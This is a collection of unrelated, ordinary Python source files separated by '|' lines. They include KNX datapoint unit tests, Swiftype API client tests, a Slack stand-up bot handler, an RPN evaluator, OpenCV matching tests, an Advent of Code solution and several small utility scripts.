def test_temperature_assert_min_exceeded_from_knx(self):
"""Testing parsing of DPTTemperature with wrong value."""
with pytest.raises(ConversionError):
DPTTemperature.from_knx((0xB1, 0xE6)) # -1000
#
# DPTLux
#
def test_lux_settings(self):
"""Test attributes of DPTLux."""
assert DPTLux.value_min == 0
assert DPTLux.value_max == 670760
assert DPTLux.unit == "lx"
assert DPTLux.resolution == 0.01
def test_lux_assert_min_exceeded(self):
"""Test parsing of DPTLux with wrong value."""
with pytest.raises(ConversionError):
DPTLux.to_knx(-1)
#
# DPTHumidity
#
def test_humidity_settings(self):
"""Test attributes of DPTHumidity."""
assert DPTHumidity.value_min == 0
assert DPTHumidity.value_max == 670760
assert DPTHumidity.unit == "%"
assert DPTHumidity.resolution == 0.01
def test_humidity_assert_min_exceeded(self):
"""Test parsing of DPTHumidity with wrong value."""
with pytest.raises(ConversionError):
DPTHumidity.to_knx(-1)
#
# DPTEnthalpy
#
def test_enthalpy_settings(self):
"""Test attributes of DPTEnthalpy."""
assert DPTEnthalpy.unit == "H"
#
# DPTPartsPerMillion
#
def test_partspermillion_settings(self):
"""Test attributes of DPTPartsPerMillion."""
assert DPTPartsPerMillion.unit == "ppm"
#
# DPTVoltage
#
def test_voltage_settings(self):
"""Test attributes of DPTVoltage."""
assert DPTVoltage.unit == "mV"
# ####################################################################
# DPT4ByteFloat
#
def test_4byte_float_values_from_power_meter(self):
"""Test parsing DPT4ByteFloat value from power meter."""
assert DPT4ByteFloat.from_knx((0x43, 0xC6, 0x80, 00)) == 397
assert DPT4ByteFloat.to_knx(397) == (0x43, 0xC6, 0x80, 00)
assert DPT4ByteFloat.from_knx((0x42, 0x38, 0x00, 00)) == 46
assert DPT4ByteFloat.to_knx(46) == (0x42, 0x38, 0x00, 00)
def test_14_033(self):
"""Test parsing DPTFrequency unit."""
assert DPTFrequency.unit == "Hz"
def test_14_055(self):
"""Test DPTPhaseAngleDeg object."""
assert DPT4ByteFloat.from_knx((0x42, 0xEF, 0x00, 0x00)) == 119.5
assert DPT4ByteFloat.to_knx(119.5) == (0x42, 0xEF, 0x00, 0x00)
assert DPTPhaseAngleDeg.unit == "°"
def test_14_057(self):
"""Test DPT4ByteFloat object."""
assert DPT4ByteFloat.from_knx((0x3F, 0x71, 0xEB, 0x86)) == 0.9450001
assert DPT4ByteFloat.to_knx(0.945000052452) == (0x3F, 0x71, 0xEB, 0x86)
assert DPT4ByteFloat.unit == ""
def test_4byte_float_values_from_voltage_meter(self):
"""Test parsing DPT4ByteFloat from voltage meter."""
assert DPT4ByteFloat.from_knx((0x43, 0x65, 0xE3, 0xD7)) == 229.89
assert DPT4ByteFloat.to_knx(229.89) == (0x43, 0x65, 0xE3, 0xD7)
def test_4byte_float_zero_value(self):
"""Test parsing and streaming of DPT4ByteFloat zero value."""
assert DPT4ByteFloat.from_knx((0x00, 0x00, 0x00, 0x00)) == 0.00
assert DPT4ByteFloat.to_knx(0.00) == (0x00, 0x00, 0x00, 0x00)
def test_4byte_float_special_value(self):
"""Test parsing and streaming of DPT4ByteFloat special value."""
assert math.isnan(DPT4ByteFloat.from_knx((0x7F, 0xC0, 0x00, 0x00)))
assert DPT4ByteFloat.to_knx(float("nan")) == (0x7F, 0xC0, 0x00, 0x00)
assert math.isinf(DPT4ByteFloat.from_knx((0x7F, 0x80, 0x00, 0x00)))
assert DPT4ByteFloat.to_knx(float("inf")) == (0x7F, 0x80, 0x00, 0x00)
assert DPT4ByteFloat.from_knx((0xFF, 0x80, 0x00, 0x00)) == float("-inf")
assert DPT4ByteFloat.to_knx(float("-inf")) == (0xFF, 0x80, 0x00, 0x00)
assert DPT4ByteFloat.from_knx((0x80, 0x00, 0x00, 0x00)) == float("-0")
assert DPT4ByteFloat.to_knx(float("-0")) == (0x80, 0x00, 0x00, 0x00)
def test_4byte_float_to_knx_wrong_parameter(self):
"""Test parsing of DPT4ByteFloat with wrong value (string)."""
with pytest.raises(ConversionError):
DPT4ByteFloat.to_knx("fnord")
def test_4byte_float_from_knx_wrong_parameter(self):
"""Test parsing of DPT4ByteFloat with wrong value (wrong number of bytes)."""
with pytest.raises(ConversionError):
DPT4ByteFloat.from_knx((0xF8, 0x01, 0x23))
def test_4byte_float_from_knx_wrong_parameter2(self):
"""Test parsing of DPT4ByteFloat with wrong value (second parameter is a string)."""
with pytest.raises(ConversionError):
DPT4ByteFloat.from_knx((0xF8, "0x23", 0x00, 0x00))
def test_4byte_flaot_from_knx_unpack_error(self):
"""Test DPT4ByteFloat parsing with unpack error."""
with patch("struct.unpack") as unpack_mock:
unpack_mock.side_effect = struct.error()
with pytest.raises(ConversionError):
DPT4ByteFloat.from_knx((0x01, 0x23, 0x02, 0x02))
#
# DPTElectricCurrent
#
def test_electric_current_settings(self):
"""Test attributes of DPTElectricCurrent."""
assert DPTElectricCurrent.unit == "A"
#
# DPTElectricPotential
#
def test_electric_potential_settings(self):
"""Test attributes of DPTElectricPotential."""
assert DPTElectricPotential.unit == "V"
#
# DPTPower
#
def test_power_settings(self):
"""Test attributes of DPTPower."""
assert DPTPower.unit == "W"
|
import logging
import definitions
class EvaluateError(Exception):
def __init__(self, eIdent, eArgCount, argCount):
self.ident = eIdent
self.eArgCount = eArgCount
self.argCount = argCount
def __str__(self):
msg = 'too less arguments for ' + str(self.ident) + ' -- '
msg += 'requires: ' + str(self.argCount) + ', provided: ' + str(self.eArgCount)
return msg
class Evaluator(object):
def _eval(self, iArgs):
'''
@iExpr -- list, describes function or operator (iExpr[0]) with its arguments (iExpr[>0])
Return value: Identifier -- result of evaluating
'''
op = iArgs[0]
result = False
if op in definitions._operators.keys():
result = definitions._operators[op].alg(iArgs[1:])
logging.debug('Evaluate operator: ' + op + ' with arguments: (' + \
', '.join([ str(arg) for arg in iArgs[1:] ]) + \
'); result: ' + str(result) + ';')
elif op in definitions._functions.keys():
result = definitions._functions[op].alg(iArgs[1:])
logging.debug('Evaluate function: ' + op + ' with arguments: (' + \
', '.join([ str(arg) for arg in iArgs[1:] ]) + \
'); result: ' + str(result) + ';')
return result
def evaluate(self, iExpr):
'''
@iExpr -- math string in RPN (list)
This function computes @iExpr
Return value: int or float or bool
'''
logging.info('Evaluator started.')
stack = []
for ident in iExpr:
if (ident.type == 'num'):
stack.append(ident)
else: # operator or function
nArgs = 0
if (ident.type == 'op'):
nArgs = definitions._operators[ident.val].argCount
else:
nArgs = definitions._functions[ident.val].argCount
args = []
if (len(stack) < nArgs):
raise EvaluateError(ident.val, len(stack), nArgs)
else:
for i in range(nArgs):
args.append(stack.pop().val)
args.append(ident.val)
args.reverse() # we must reverse args to provide them in correct order
stack.append(definitions.Identifier(type = 'num', val = self._eval(args)))
if (len(stack) == 1):
return stack.pop().val
|
"""
Simpler example printing the list of chats you have.
"""
from pytg.sender import Sender
__author__ = 'luckydonald'
def main():
x = Sender("127.0.0.1", 4458)
result = x.dialog_list()
print("Got: %s" % str(result))
if __name__ == '__main__':
main()
|
import json
import logging
import re
logger = logging.getLogger(__name__)
class RtmEventHandler(object):
def __init__(self, slack_clients, msg_writer):
self.clients = slack_clients
self.msg_writer = msg_writer
self.stand_up = self.get_standup_channel_id()
def get_standup_channel_id(self):
return self.clients.web.channels.get_channel_id('stand-up')
def get_bottest_channel_id(self):
return self.clients.web.channels.get_channel_id('testing-bots')
def handle(self, event):
if 'type' in event:
self._handle_by_type(event['type'], event)
def _handle_by_type(self, event_type, event):
# See https://api.slack.com/rtm for a full list of events
if event_type == 'error':
# error
self.msg_writer.write_error(event['channel'], json.dumps(event))
elif event_type == 'message':
# message was sent to channel
self._handle_message(event)
elif event_type == 'channel_joined':
# you joined a channel
self.msg_writer.write_help_message(event['channel'])
elif event_type == 'group_joined':
# you joined a private group
self.msg_writer.write_help_message(event['channel'])
else:
pass
def _handle_message(self, event):
# Filter out messages from the bot itself, and from non-users (eg. webhooks)
if ('user' in event) and (not self.clients.is_message_from_me(event['user'])):
msg_txt = event['text']
if self.clients.is_bot_mention(msg_txt) or self._is_direct_message(event['channel']):
if re.search('fuck|shit|bitch|stupid|damn|:middle_finger:', msg_txt):
self.msg_writer.write_language_sass(event['channel'])
elif 'help' in msg_txt:
self.msg_writer.write_help_message(event['channel'], event['user'])
elif re.search('hi|hey|hello', msg_txt):
self.msg_writer.write_greeting(event['channel'], event['user'])
elif 'schedule' in msg_txt:
self.msg_writer.write_schedule(event['channel'])
elif 'stand-up' in msg_txt or 'commit' in msg_txt:
if 'taylor' in msg_txt or 'Taylor' in msg_txt:
self.msg_writer.write_commitments(event['channel'], self.clients.get_user_id("taylor"), "Taylor's")
if 'pete' in msg_txt or 'Pete' in msg_txt:
self.msg_writer.write_commitments(event['channel'], self.clients.get_user_id("pete_m"), "Pete's")
if 'emma' in msg_txt or 'Emma' in msg_txt:
self.msg_writer.write_commitments(event['channel'], self.clients.get_user_id("emma"), "Emma's")
if 'ben' in msg_txt or 'Ben' in msg_txt:
self.msg_writer.write_commitments(event['channel'], self.clients.get_user_id("bendroste"), "Ben's")
if 'parker' in msg_txt or 'Parker' in msg_txt:
self.msg_writer.write_commitments(event['channel'], self.clients.get_user_id("parker"), "Parker's")
if not re.search('[Tt]aylor|[Ee]mma|[Bb]en|[Pp]arker|[Pp]ete', msg_txt):
self.msg_writer.write_commitments(event['channel'], event['user'])
elif "what's left" in msg_txt or 'graduate' in msg_txt:
if 'update' in msg_txt:
self.msg_writer.update_remaining(event['channel'], event['user'], msg_txt.split("with")[-1])
elif "remove" in msg_txt:
self.msg_writer.remove_remaining(event['channel'], [int(s) for s in msg_txt.split() if s.isdigit()])
else:
self.msg_writer.write_remaining(event['channel'])
elif 'AMF' in msg_txt or 'amf' in msg_txt:
self.msg_writer.write_amf(event['channel'], event['user'])
elif re.search('bye|farewell|peace|goodbye', msg_txt):
self.msg_writer.write_goodbye(event['channel'])
else:
self.msg_writer.write_prompt(event['channel'])
elif event['channel'] == self.get_standup_channel_id():
self.msg_writer.update_commitments(event['user'], msg_txt)
elif 'user' not in event and self._is_direct_message(event['channel']):
msg_txt = event['text']
self.msg_writer.update_schedule(msg_txt)
def _is_direct_message(self, channel):
"""Check if channel is a direct message channel
Args:
channel (str): Channel in which a message was received
"""
return channel.startswith('D')
|
from swiftype import swiftype
import os
import time
import unittest2 as unittest
from six.moves.urllib_parse import urlparse, parse_qs
import vcr
from mock import Mock
class TestClientFunctions(unittest.TestCase):
def setUp(self):
try:
api_key = os.environ['API_KEY']
except:
api_key = "a-test-api-key"
self.client = swiftype.Client(api_key=api_key, host='localhost:3000')
self.engine = 'api-test'
self.document_type = 'books'
def test_engines(self):
with vcr.use_cassette('fixtures/engines.yaml'):
self.__is_expected_collection(self.client.engines, 200, 3, {'slug': 'api-test'})
def test_engine(self):
with vcr.use_cassette('fixtures/engine.yaml'):
slug = self.client.engine(self.engine)['body']['slug']
self.assertEqual(slug, self.engine)
def test_engine_create(self):
with vcr.use_cassette('fixtures/engine_create.yaml'):
engine = 'myengine'
slug = self.client.create_engine(engine)['body']['slug']
self.assertEqual(slug, engine)
def test_engine_destroy(self):
with vcr.use_cassette('fixtures/engine_destroy.yaml'):
engine = 'myengine'
response = self.client.destroy_engine(engine)
self.assertEqual(response['status'], 204)
def test_document_types(self):
with vcr.use_cassette('fixtures/document_types.yaml'):
self.__is_expected_collection(self.client.document_types, 200, 2, {'slug': 'books'}, self.engine)
def test_document_type(self):
with vcr.use_cassette('fixtures/document_type.yaml'):
self.__is_expected_result(self.client.document_type, 200, {'slug': self.document_type}, self.engine, self.document_type)
def test_create_document_type(self):
with vcr.use_cassette('fixtures/create_document_type.yaml'):
document_type = 'videos'
slug = self.client.create_document_type(self.engine, document_type)['body']['slug']
self.assertEqual(slug, document_type)
def test_destroy_document_type(self):
with vcr.use_cassette('fixtures/destroy_document_type.yaml'):
document_type = 'videos'
response = self.client.destroy_document_type(self.engine, document_type)
self.assertEqual(response['status'], 204)
def test_documents(self):
with vcr.use_cassette('fixtures/documents.yaml'):
self.__is_expected_collection(self.client.documents, 200, 2, {'external_id': '1'}, self.engine, self.document_type)
def test_documents_pagination(self):
with vcr.use_cassette('fixtures/documents_pagination.yaml'):
self.__is_expected_collection(self.client.documents, 200, 2, {'external_id': '1'}, self.engine, self.document_type, 2, 10)
def test_document(self):
with vcr.use_cassette('fixtures/document.yaml'):
external_id = '1'
id = self.client.document(self.engine, self.document_type, external_id)['body']['external_id']
self.assertEqual(id, external_id)
def test_create_document(self):
with vcr.use_cassette('fixtures/create_document.yaml'):
doc_id = 'doc_id'
id = self.client.create_document(self.engine, self.document_type, {'external_id': doc_id})['body']['external_id']
self.assertEqual(id, doc_id)
def test_create_documents(self):
with vcr.use_cassette('fixtures/create_documents.yaml'):
docs = [{'external_id': 'doc_id1'}, {'external_id': 'doc_id2'}]
stati = self.client.create_documents(self.engine, self.document_type, docs)['body']
self.assertEqual(stati, [True, True])
def test_create_or_update_document(self):
with vcr.use_cassette('fixtures/create_or_update_document.yaml'):
id = '1'
external_id = self.client.create_or_update_document(self.engine, self.document_type, {'external_id': id, 'fields': {}})['body']['external_id']
self.assertEqual(external_id, id)
def test_create_or_update_documents(self):
with vcr.use_cassette('fixtures/create_or_update_documents.yaml'):
docs = [{'external_id': '1'}, {'external_id': '2'}]
stati = self.client.create_or_update_documents(self.engine, self.document_type, docs)['body']
self.assertEqual(stati, [True, True])
def test_create_or_update_documents_failure(self):
with vcr.use_cassette('fixtures/create_or_update_documents_failure.yaml'):
docs = [{'external_id': '1', 'fields': [{'type': 'string', 'name': 'title'}]}] # <= missing 'value'
stati = self.client.create_or_update_documents(self.engine, self.document_type, docs)['body']
self.assertEqual(stati, [False])
def test_create_or_update_documents_verbose(self):
with vcr.use_cassette('fixtures/create_or_update_documents_verbose.yaml'):
docs = [{'external_id': '1'}, {'external_id': '2'}]
stati = self.client.create_or_update_documents_verbose(self.engine, self.document_type, docs)['body']
self.assertEqual(stati, [True, True])
def test_create_or_update_documents_verbose_failure(self):
with vcr.use_cassette('fixtures/create_or_update_documents_verbose_failure.yaml'):
docs = [{'external_id': '1', 'fields': [{'type': 'string', 'name': 'title'}]}] # <= missing 'value'
stati = self.client.create_or_update_documents_verbose(self.engine, self.document_type, docs)['body']
self.assertRegexpMatches(stati[0], r'^Invalid field definition')
def test_update_document(self):
with vcr.use_cassette('fixtures/update_document.yaml'):
document_id = '2'
id = self.client.update_document(self.engine, self.document_type, document_id, {'title': 'a new title'})['body']['external_id']
self.assertEqual(id, document_id)
def test_update_documents(self):
with vcr.use_cassette('fixtures/update_documents.yaml'):
documents = [ {'external_id': '1', 'fields': { 'myfieldthathasnotbeencreated': 'foobar' }},
{'external_id': '2', 'fields': { 'title': 'new title' }} ]
stati = self.client.update_documents(self.engine, self.document_type, documents)['body']
self.assertEqual(stati, [False, True])
def test_destroy_document(self):
with vcr.use_cassette('fixtures/destroy_document.yaml'):
response = self.client.destroy_document(self.engine, self.document_type, 'doc_id')
self.assertEqual(response['status'], 204)
def test_destroy_documents(self):
with vcr.use_cassette('fixtures/destroy_documents.yaml'):
documents = ['doc_id1', 'doc_id2']
stati = self.client.destroy_documents(self.engine, self.document_type, documents)['body']
self.assertEqual(stati, [True, True])
def test_search(self):
with vcr.use_cassette('fixtures/search.yaml'):
total_count = len(self.client.document_types(self.engine)['body'])
self.assertTrue(total_count > 1)
self.__is_expected_search_result(self.client.search, total_count)
def test_search_with_options(self):
with vcr.use_cassette('fixtures/search_with_options.yaml'):
total_count = len(self.client.document_types(self.engine)['body'])
self.assertTrue(total_count > 1)
response = self.client.search(self.engine, 'query', {'page': 2})
self.assertEqual(len(response['body']['records']), total_count)
def test_search_document_type(self):
with vcr.use_cassette('fixtures/search_document_type.yaml'):
self.__is_expected_search_result(self.client.search_document_type, 1, [self.document_type])
def test_search_document_type_with_options(self):
with vcr.use_cassette('fixtures/search_document_type_with_options.yaml'):
response = self.client.search_document_type(self.engine, self.document_type, "query", {'page': 2})
self.assertEqual(len(response['body']['records']), 1)
def test_suggest(self):
with vcr.use_cassette('fixtures/suggest.yaml'):
total_count = len(self.client.document_types(self.engine)['body'])
self.assertTrue(total_count > 1)
self.__is_expected_search_result(self.client.suggest, total_count)
def test_suggest_with_options(self):
with vcr.use_cassette('fixtures/suggest_with_options.yaml'):
total_count = len(self.client.document_types(self.engine)['body'])
self.assertTrue(total_count > 1)
response = self.client.suggest(self.engine, 'query', {'page': 2})
self.assertEqual(len(response['body']['records']), total_count)
def test_suggest_document_type(self):
with vcr.use_cassette('fixtures/suggest_document_type.yaml'):
self.__is_expected_search_result(self.client.suggest_document_type, 1, [self.document_type])
def test_suggest_document_type_with_options(self):
with vcr.use_cassette('fixtures/suggest_document_type_with_options.yaml'):
response = self.client.suggest_document_type(self.engine, self.document_type, "query", {'page': 2})
self.assertEqual(len(response['body']['records']), 1)
def test_analytics_searches(self):
with vcr.use_cassette('fixtures/analytics_searches.yaml'):
searches = self.client.analytics_searches(self.engine)['body']
self.assertTrue(len(searches) == 15)
def test_analytics_searches_pagination(self):
with vcr.use_cassette('fixtures/analytics_searches_pagination.yaml'):
searches = self.client.analytics_searches(self.engine, '2013-12-31', '2014-01-01')['body']
self.assertTrue(len(searches) == 2)
def test_analytics_autoselects(self):
with vcr.use_cassette('fixtures/analytics_autoselects.yaml'):
autoselects = self.client.analytics_autoselects(self.engine)['body']
self.assertTrue(len(autoselects) == 15)
def test_analytics_autoselects_pagination(self):
with vcr.use_cassette('fixtures/analytics_autoselects_pagination.yaml'):
autoselects = self.client.analytics_autoselects(self.engine, '2013-12-31', '2014-01-01')['body']
self.assertTrue(len(autoselects) == 2)
def test_analytics_top_queries(self):
with vcr.use_cassette('fixtures/analytics_top_queries.yaml'):
top_queries = self.client.analytics_top_queries(self.engine)['body']
self.assertTrue(len(top_queries) == 2)
def test_analytics_top_queries_pagination(self):
with vcr.use_cassette('fixtures/analytics_top_queries_pagination.yaml'):
top_queries = self.client.analytics_top_queries(self.engine, 2, 10)['body']
self.assertTrue(len(top_queries) == 2)
def test_analytics_top_queries_in_range(self):
with vcr.use_cassette('fixtures/analytics_top_queries_in_range.yaml'):
top_queries = self.client.analytics_top_queries_in_range(self.engine, '2013-12-31', '2014-01-01')['body']
self.assertTrue(len(top_queries) == 2)
def test_analytics_top_no_result_queries(self):
with vcr.use_cassette('fixtures/analytics_top_no_result_queries.yaml'):
autoselects = self.client.analytics_top_no_result_queries(self.engine)['body']
self.assertTrue(len(autoselects) == 2)
def test_analytics_top_no_result_queries_with_dates(self):
with vcr.use_cassette('fixtures/analytics_top_no_result_queries_with_dates.yaml'):
autoselects = self.client.analytics_top_no_result_queries(self.engine, '2013-12-31', '2014-01-01')['body']
self.assertTrue(len(autoselects) == 2)
def test_domains(self):
with vcr.use_cassette('fixtures/domains.yaml'):
domains = self.client.domains('crawler-demo')['body']
self.assertTrue(len(domains) == 2)
def test_domain(self):
with vcr.use_cassette('fixtures/domain.yaml'):
domain_id = '52c759423ae7403ec900003b'
domain = self.client.domain('crawler-demo', domain_id)['body']
self.assertEqual(domain['id'], domain_id)
def test_create_domain(self):
with vcr.use_cassette('fixtures/create_domain.yaml'):
url = 'http://www.example.com'
domain_url = self.client.create_domain('crawler-demo', url)['body']['submitted_url']
self.assertEqual(domain_url, url)
def test_destroy_domain(self):
with vcr.use_cassette('fixtures/destroy_domain.yaml'):
status = self.client.destroy_domain('crawler-demo', '52c759423ae7403ec900003b')['status']
self.assertEqual(status, 204)
def test_recrawl_domain(self):
with vcr.use_cassette('fixtures/recrawl_domain.yaml'):
domain_id = '52c754fb3ae7406fd3000001'
domain = self.client.recrawl_domain('crawler-demo', domain_id)['body']
self.assertEqual(domain['id'], domain_id)
def test_crawl_url(self):
with vcr.use_cassette('fixtures/crawl_domain.yaml'):
domain_id = '52c754fb3ae7406fd3000001'
url = 'http://crawler-demo-site.herokuapp.com/2012/01/01/first-post.html'
crawled_url = self.client.crawl_url('crawler-demo', domain_id, url)['body']['url']
self.assertEqual(crawled_url, url)
def __is_expected_search_result(self, request, document_type_count, args=[]):
response = request(self.engine, *(args + ['*']))
self.assertEqual(len(response['body']['records']), document_type_count)
def __is_expected_result(self, request, status_code, expected_values, *args):
response = request(*args)
self.assertEqual(response['status'], status_code)
for k,v in expected_values.items():
self.assertEqual(response['body'][k], v)
def __is_expected_collection(self, request, status_code, collection_length, expected_values, *args):
response = request(*args)
self.assertEqual(response['status'], status_code)
self.assertEqual(len(response['body']), collection_length)
for k,v in expected_values.items():
self.assertEqual(len([item for item in response['body'] if item[k] == v]), 1)
def __time_name(self):
return str(int(time.mktime(time.gmtime())))
def __create_temporary_engine(self, name = None):
name = name if name else self.__time_name()
return
class TestClientUsernameAndPassword(unittest.TestCase):
def setUp(self):
self.client = swiftype.Client(
username='some_user',
password='some_pasword',
host='localhost:3000'
)
def test_engine_create(self):
with vcr.use_cassette('fixtures/engine_create.yaml'):
engine = 'myengine'
slug = self.client.create_engine(engine)['body']['slug']
self.assertEqual(slug, engine)
class TestPlatformUsers(unittest.TestCase):
def setUp(self):
try:
api_key = os.environ['API_KEY']
except:
api_key = "a-test-api-key"
client_id = '3e4fd842fc99aecb4dc50e5b88a186c1e206ddd516cdd336da3622c4afd7e2e9'
client_secret = '4441879b5e2a9c3271f5b1a4bc223b715f091e5ed20fe75d1352e1290c7a6dfb'
self.client = swiftype.Client(api_key=api_key, client_id=client_id, client_secret=client_secret, host='localhost:3000')
def test_users(self):
with vcr.use_cassette('fixtures/users.yaml'):
response = self.client.users()
self.assertEqual(response['status'], 200)
self.assertEqual(len(response['body']), 2)
def test_users_pagination(self):
with vcr.use_cassette('fixtures/users_pagination.yaml'):
response = self.client.users(page=2)
self.assertEqual(response['status'], 200)
self.assertEqual(len(response['body']), 0)
def test_user(self):
with vcr.use_cassette('fixtures/user.yaml'):
user_id = '12345'
response = self.client.user(user_id)
self.assertEqual(response['body']['id'], user_id)
def test_create_user(self):
with vcr.use_cassette('fixtures/create_user.yaml'):
response = self.client.create_user()
self.assertEqual(response['status'], 200)
def test_sso_token(self):
timestamp = 1379382520
user_id = '5064a7de2ed960e715000276'
token = self.client._sso_token(user_id, timestamp)
self.assertEqual(token, '81033d182ad51f231cc9cda9fb24f2298a411437')
def test_sso_url(self):
self.client._get_timestamp = Mock(return_value=1379382520)
user_id = '5064a7de2ed960e715000276'
url = self.client.sso_url(user_id)
self.assertEqual(
parse_qs(urlparse(url).query),
{
'user_id': ['5064a7de2ed960e715000276'],
'client_id': ['3e4fd842fc99aecb4dc50e5b88a186c1e206ddd516cdd336da3622c4afd7e2e9'],
'token': ['81033d182ad51f231cc9cda9fb24f2298a411437'],
'timestamp': ['1379382520'],
},
)
class TestPlatformResources(unittest.TestCase):
def setUp(self):
access_token = '6cf7fbd297f00a8e3863a0595f55ff7d141cbef2fcbe00159d0f7403649b384e'
self.engine = 'myusersengine'
self.document_type = 'videos'
self.client = swiftype.Client(access_token=access_token, host='localhost:3000')
def test_platform_engine_create(self):
with vcr.use_cassette('fixtures/platform_engine_create.yaml'):
response = self.client.create_engine(self.engine)
self.assertEqual(response['body']['name'], self.engine)
def test_platform_create_document_type(self):
with vcr.use_cassette('fixtures/platform_create_document_type.yaml'):
response = self.client.create_document_type(self.engine, self.document_type)
self.assertEqual(response['body']['slug'], self.document_type)
def test_platform_create_document(self):
with vcr.use_cassette('fixtures/platform_create_document.yaml'):
doc_id = 'doc_id'
id = self.client.create_document(self.engine, self.document_type, {'external_id': doc_id})['body']['external_id']
self.assertEqual(id, doc_id)
def test_platform_create_documents(self):
with vcr.use_cassette('fixtures/platform_create_documents.yaml'):
docs = [{'external_id': 'doc_id1'}, {'external_id': 'doc_id2'}]
stati = self.client.create_documents(self.engine, self.document_type, docs)['body']
self.assertEqual(stati, [True, True])
if __name__ == '__main__':
unittest.main()
|
"""
MIT License
Copyright (c) 2017 Maxim Krivich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
|
def factR(n):
'''
n is an int > 0
return n!
'''
if n == 1:
return n
else:
return n * factR(n - 1)
|
import cv2_product_test.find
import unittest
import os
import cv2
import numpy as np
DATA_DIR = os.path.dirname(os.path.abspath(__file__))
IMG1 = cv2.imread(os.path.join(DATA_DIR, 'icons.png'))
TGT1 = cv2.imread(os.path.join(DATA_DIR, 'icons_region.png'))
EXP1 = [[172, 62], [270, 62], [270, 163], [172, 163]]
IMG2 = cv2.imread(os.path.join(DATA_DIR, 'android.png'))
TGT2A = cv2.imread(os.path.join(DATA_DIR, 'android_camcorder.png'))
EXP2B = [[1170, 632], [1305, 632], [1305, 788], [1170, 788]]
TGT2B = cv2.imread(os.path.join(DATA_DIR, 'android_firefox.png'))
class TestFeatures(unittest.TestCase):
def test_sift_flann(self):
s = cv2_product_test.find.find(TGT1, IMG1, 'sift-flann')
self.assertIsNotNone(s)
np.testing.assert_allclose(s.quad, EXP1, atol=5.0)
vis = s.visualize()
#cv2.imwrite('tmp.png', vis)
def test_surf_flann(self):
s = cv2_product_test.find.find(TGT1, IMG1, 'surf-flann')
self.assertIsNotNone(s)
np.testing.assert_allclose(s.quad, EXP1, atol=5.0)
def test_surf_flann_2(self):
s = cv2_product_test.find.find(TGT2B, IMG2, 'sift-flann')
self.assertIsNotNone(s)
#np.testing.assert_allclose(s.quad, EXP2B, atol=5.0)
def test_template(self):
s = cv2_product_test.find.find(TGT2B, IMG2, 'template')
self.assertIsNotNone(s)
np.testing.assert_allclose(s.quad, EXP2B)
@unittest.SkipTest
def test_draw_keypoints(self):
f = cv2_product_test.find.Features('sift-flann')
img = f.draw_keypoints(TGT2B)
cv2.namedWindow('draw_keypoints')
cv2.imshow('draw_keypoints', img)
cv2.waitKey(0)
|
"""Advent of Code 2015, Day 10: Elves Look, Elves Say"""
import pytest
puzzle_input = '1113122113'
def parse_number_string(number_string):
char, *text = str(number_string) # str just in case
count = 1
output = ''
for new_char in text:
if new_char == char:
count += 1
else:
output += str(count) + char
char = new_char
count = 1
output += str(count) + char # Account for final digit
return output
@pytest.mark.parametrize('start,finish', [
('1', '11'),
('11', '21'),
('21', '1211'),
('211', '1221'),
('1211', '111221'),
('111221', '312211'),
])
def test_parse_number_string(start, finish):
assert parse_number_string(start) == finish
if __name__ == '__main__':
for x in range(50):
if x == 40:
print(len(puzzle_input))
puzzle_input = parse_number_string(puzzle_input)
print(len(puzzle_input))
|
from Util.position import Position
from Util.role import Role
from ai.Algorithm.Graph.Graph import Graph
from ai.STA.Strategy.strategy import Strategy
from ai.STA.Tactic.go_to_random_pose_in_zone import GoToRandomPosition
class PathfinderBenchmark(Strategy):
def __init__(self, p_game_state):
super().__init__(p_game_state)
for role, player in self.assigned_roles.items():
self.create_node(role, GoToRandomPosition(self.game_state, player,
center_of_zone=Position(-0, 0),
width_of_zone=2000,
height_of_zone=2000))
@classmethod
def required_roles(cls):
return []
@classmethod
def optional_roles(cls):
return [r for r in Role]
|
import sys
import numpy as np
import pandas as pd
from sklearn.metrics import confusion_matrix, classification_report
if len(sys.argv) != 2:
print("Enter the model option.")
exit()
if sys.argv[1] == "--hunpos":
check = 0;
elif sys.argv[1] == "--crf++":
check = 1
else:
print "Enter correct option."
exit()
dir_path = "./"
if not check:
test_data_labels_file = dir_path + "test.txt"
predicted_labels_file = dir_path + "chunking_result.txt"
labels = set()
predicted_labels = []
test_data_labels = []
if not check:
with open(test_data_labels_file, "r") as file1, open(predicted_labels_file, "r") as file2:
for line in (l.rstrip() for l in file1):
temp = line.split()
if temp:
test_data_labels.append(temp[2])
labels.add(temp[2])
for line in (l.rstrip() for l in file2):
if line:
predicted_labels.append(line.split()[1])
else:
with open(predicted_labels_file, "r") as file:
for line in (l.rstrip() for l in file):
if line:
predicted_labels.append(line.split()[3])
test_data_labels.append(line.split()[2])
labels.add(line.split()[2])
labels = sorted(list(labels))
predicted_labels = np.array(predicted_labels)
test_data_labels = np.array(test_data_labels)
simple_conf_matrix = confusion_matrix(test_data_labels,predicted_labels)
conf_matrix = pd.DataFrame(columns = labels, index = labels)
for x,y in zip(simple_conf_matrix,labels):
conf_matrix[y] = x
conf_matrix = conf_matrix.transpose()
print conf_matrix
print "Classification Report: " + classification_report(test_data_labels, predicted_labels)
|
import flask
status = flask.Blueprint('status', __name__)
@status.route('/status/healthcheck')
def healthcheck() -> str:
return ''
|
"""context processors
"""
from django.contrib.sites.models import Site
from django.utils.functional import SimpleLazyObject
def site(request):
"""get site object
"""
return {
'site': SimpleLazyObject(
lambda: 'http://%s' % Site.objects.get_current_site().domain
),
}
|
import subprocess
from subprocess import Popen,PIPE
import os
import ConfigParser
import csv
import sys
import shlex
import re
import unicodedata
import time
import shutil
from distutils.dir_util import copy_tree
import zipfile
interval=240
delugePath=''
megatoolsPath=''
zip7Path=""
thisdir=False#os.getcwd()
mstart='magnet:?xt=urn:btih:'
completedStatus={}
